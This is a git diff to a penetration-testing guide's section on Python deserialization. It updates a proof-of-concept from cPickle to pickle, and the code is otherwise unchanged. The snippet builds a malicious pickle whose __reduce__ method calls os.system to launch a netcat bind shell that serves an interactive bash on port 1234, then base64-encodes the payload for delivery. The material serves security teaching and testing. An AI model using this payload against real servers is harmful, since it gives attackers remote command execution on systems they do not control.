diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md
index 2842cd994..3b5882239 100644
--- a/pentesting-web/deserialization/README.md
+++ b/pentesting-web/deserialization/README.md
@@ -85,11 +85,11 @@ When the object gets unpickle, the function _\_\_reduce\_\__ will be executed.
 When exploited, server could return an error.
 
 ```python
-import cPickle, os, base64
+import pickle, os, base64
 class P(object):
     def __reduce__(self):
         return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
-print(base64.b64encode(cPickle.dumps(P())))
+print(base64.b64encode(pickle.dumps(P())))
 ```
 
 ## NodeJS